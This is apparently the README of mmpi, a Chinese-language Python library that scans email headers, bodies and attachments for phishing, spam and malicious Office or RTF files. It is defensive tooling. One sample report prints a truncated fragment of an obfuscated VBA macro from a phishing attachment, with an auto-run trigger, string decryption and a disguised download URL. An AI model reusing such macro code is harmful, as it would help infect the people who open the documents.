mmpi
,一款邮件快速检测python库,基于community
框架设计开发。支持对邮件头、邮件正文、邮件附件的检测,并输出检测结果。
$ pip install mmpi
备注:windows
安装yara-python
,可以从这里下载,再使用pip install yara_python-xx-xx-xx-win_amd64.whl
进行安装
命令行 | 说明 | 使用示例 | 结果输出 |
---|---|---|---|
nextb-mmpi-scan | 使用nextb-mmpi-scan工具扫描指定的邮件目录或者邮件文件 | nextb-mmpi-scan -s $email_dir |
输出格式参考扫描结果 |
nextb-mmpi-run | 使用nextb-mmpi-run工具扫描指定的邮件文件,并返回完整报告 | nextb-mmpi-run -f $email_file |
输出格式参考报告格式 |
from mmpi import mmpi
def main():
emp = mmpi()
emp.parse('test.eml')
report = emp.get_report()
print(report)
if __name__ == "__main__":
main()
扫描输出格式如下
> nextb-mmpi-scan.exe -s .
nextb-mmpi-scan扫描中: 100%|████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:00<00:00, 23.35eml/s]
+----------+--------------------+
| 邮件名称 | NextB-mmpi命中标签 |
+----------+--------------------+
| .\1.eml | 未检出 |
| .\10.eml | spam_detection |
| .\11.eml | 未检出 |
| .\2.eml | 未检出 |
| .\3.eml | 未检出 |
| .\4.eml | invalid_zip_file |
| .\5.eml | ole_type_not_match |
| .\6.eml | 未检出 |
| .\7.eml | spam_detection |
| .\8.eml | 未检出 |
| .\9.eml | spam_detection |
+----------+--------------------+
包含固定字段:
headers
:邮件头基本信息body
:邮件正文,text和html格式attachments
:附件列表signatures
:检测标签
动态字段:
vba
:宏代码rtf
:rtf信息zip
:压缩包信息
# 示例1
{
"headers": [
{
"From": [
{
"name": "Mohd Mukhriz Ramli (MLNG/GNE)",
"addr": "[email protected]"
}
],
"To": [
{
"name": "",
"addr": ""
}
],
"Subject": "Re: Proforma Invoice",
"Date": "2020-11-24 12:37:38 UTC+01:00",
"X-Originating-IP": []
}
],
"body": [
{
"type": "text",
"content": " \nDEAR SIR, \n\nPLEASE SIGN THE PROFORMA INVOICE SO THAT I CAN PAY AS SOON AS POSSIBLE.\n\nATTACHED IS THE PROFORMA INVOICE,\n\nPLEASE REPLY QUICKLY, \n\nTHANKS & REGARDS' \n\nRAJASHEKAR \n\n Dubai I Kuwait I Saudi Arabia I India I Egypt \nKuwait: +965 22261501 \nSaudi Arabia: +966 920033029 \nUAE: +971 42431343 \nEmail ID: [email protected] [1]m\n \n\nLinks:\n------\n[1]\nhttps://deref-mail.com/mail/client/OV1N7sILlK8/dereferrer/?redirectUrl=https%3A%2F%2Fe.mail.ru%2Fcompose%2F%3Fmailto%3Dmailto%253ahelp%40rehlat.com"
}
],
"attachments": [
{
"type": "doc",
"filename": "Proforma Invoice.doc",
"filesize": 1826535,
"md5": "558c4aa596b0c4259182253a86b35e8c",
"sha1": "63982d410879c09ca090a64873bc582fcc7d802b"
}
],
"vba": [],
"rtf": [
{
"is_ole": true,
"format_id": 2,
"format_type": "Embedded",
"class_name": "EQUATion.3",
"data_size": 912305,
"md5": "a5cee525de80eb537cfea247271ad714"
}
],
"signatures": [
{
"name": "rtf_suspicious_detected",
"description": "RTF Suspicious Detected",
"severity": 3,
"marks": [
{
"type": "rtf",
"tag": "rtf_suspicious_detected"
}
],
"markcount": 1
},
{
"name": "rtf_exploit_detected",
"description": "RTF Exploit Detected",
"severity": 9,
"marks": [
{
"type": "rtf",
"tag": "rtf_exploit_detected"
}
],
"markcount": 1
}
]
}
# 示例2
{
"headers": [
{
"From": [
{
"name": "Pagon Favre | Purchase",
"addr": "[email protected]"
}
],
"To": [
{
"name": "",
"addr": "[email protected]"
}
],
"Subject": "Purchase Order - 19122020 [Early Dispatch Required]",
"Date": "2020-12-17 13:48:57 UTC-08:00",
"X-Originating-IP": []
}
],
"body": [],
"attachments": [
{
"type": "pps",
"filename": "Order Details.pps",
"filesize": 130048,
"md5": "9e6f2637079a311344f3cf2546de6a88",
"sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
},
{
"type": "ppt",
"filename": "Purchase Order 19122020.ppt",
"filesize": 130048,
"md5": "9e6f2637079a311344f3cf2546de6a88",
"sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
}
],
"vba": [
{
"size": 23358,
"code": "Attribute VB_Name = \"Module1\"\r\nSub Auto_CloSe()\r\n\r\nDim myChrysler As String\r\n\r\nDim myFord As String\r\n\r\nDim SistersRangeRover As String\r\n\r\nmyChrysler = decrypt(\"p\", \"3\") + decrypt(\"|\", \"9\") + decrypt(\"o\", \"7\") + decrypt(\"}\", \"9\") + decrypt(\"c\", \"2\")\r\n\r\nSistersRangeRover = \" http://%999%[email protected]/asdnabsdjncjnkk\"\r\n\r\n
....
"
}
],
"signatures": [
{
"name": "yara_detected",
"description": "detected from yara rule",
"severity": 9,
"marks": [
{
"type": "vba",
"tag": "obfuscate_macros",
"description": "obfuscate macros",
"severity": 6
},
{
"type": "vba",
"tag": "exec_macros",
"description": "exec macros",
"severity": 9
}
],
"markcount": 2
}
]
}
# 示例3
{
"headers": [
{
"From": [
{
"name": "\u7231\u83f2\u7684\u86df\u9f99",
"addr": "[email protected]"
}
],
"To": [],
"Subject": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361",
"Date": "2008-04-26 11:09:07 UTC+08:00",
"X-Originating-IP": []
}
],
"body": [
{
"type": "text",
"content": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361\u300a\u626b\u5893\u53bb\u300b \u56de\u8d60\u8d3a\u5361\u7ed9\u60a8\u7684\u597d\u53cb\r\n\r\n \u5982\u679c\u60a8\u65e0\u6cd5\u67e5\u770b\u8d3a\u5361\uff0c\u70b9\u51fb\u6b64\u5904\u67e5\u770b\u3002\r\n \u5c71\u6e05\u6c34\u79c0\u98ce\u5149\u597d\uff0c\u6708\u660e\u661f\u7a00\u796d\u626b\u591a\uff0c\u6e05\u660e\u8282\u5230\u4e86\uff0c\u4e00\u8d77\u626b\u5893\u53bb\u5427"
}
],
"attachments": [],
"signatures": []
}
邮件头解析提取邮件发件人姓名、邮箱、收件人姓名、邮箱、邮件主题、发送时间、发送IP。
通过对发件人邮箱、发送IP做黑名单匹配,实现邮件头检测。
邮件正文解析提取text、html格式内容。
对html文件做分析,实现诸如探针检测、钓鱼检测、垃圾邮件检测等检测逻辑。
邮件附件检测,支持以下文件格式:
ole
文件格式:如doc
、xls
等,提取其中的vba
宏代码、模板注入
链接zip
文件格式:提取压缩文件列表,统计文件名、文件格式等rtf
文件格式:解析内嵌ole
对象等- 其他文件格式:如
PE
可执行文件
检测逻辑包括:
- 基本信息规则检测
yara
规则检测
- neil
- cuckoosandbox
- decalage2